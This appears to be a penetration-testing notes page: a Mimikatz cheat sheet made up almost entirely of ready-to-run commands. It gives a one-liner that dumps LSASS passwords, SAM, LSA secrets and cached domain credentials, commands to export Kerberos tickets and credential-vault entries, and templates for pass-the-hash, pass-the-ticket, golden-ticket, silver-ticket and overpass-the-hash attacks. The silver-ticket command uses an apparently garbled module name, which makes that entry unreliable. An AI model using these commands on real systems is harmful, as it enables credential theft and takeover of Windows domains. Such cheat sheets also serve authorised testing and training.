🥝Mimikatz Basics

Mimikatz is a powerful tool to extract plaintext credentials, hashes, and Kerberos tickets from memory. Typically run with Administrator or SYSTEM privileges, it’s vital for Windows privilege escalation and lateral movement.

Basic Commands

mimikatz.exe
privilege::debug
token::elevate

Extracting Credentials

Oneliner

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"

Get NTLM Hashes from LSASS:

sekurlsa::logonpasswords

Dump Kerberos Tickets

sekurlsa::tickets /export

Dump Credential Manager

vault::cred

SAM Database

lsadump::sam

LSA Secrets

lsadump::secrets

Cached Domain Credentials

lsadump::cache

Lateral Movement

Pass-the-Hash Attack

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<command>

Pass The Ticket

kerberos::ptt <ticket.kirbi>

Golden Ticket

kerberos::golden /user:<username> /domain:<domain> /sid:<domain SID> /krbtgt:<krbtgt hash> /id:<RID> /target:<target FQDN> /renewmax:<duration> /ptt

Silver Ticket

kerberos::tgt::golden /user:<username> /domain:<domain> /sid:<domain SID> /service:<service> /target:<target FQDN> /rc4:<hash> /id:<RID> /ptt

Overpass-the-Hash

sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES key> /run:<command>

PreviousKernel Exploits NextEnumeration

Last updated 1 year ago

hashtagBasic Commands

hashtagExtracting Credentials

hashtagOneliner

hashtagGet NTLM Hashes from LSASS:

hashtagDump Kerberos Tickets

hashtagDump Credential Manager

hashtagSAM Database

hashtagLSA Secrets

hashtagCached Domain Credentials

hashtagLateral Movement

hashtagPass-the-Hash Attack

hashtagPass The Ticket

hashtagGolden Ticket

hashtagSilver Ticket

hashtagOverpass-the-Hash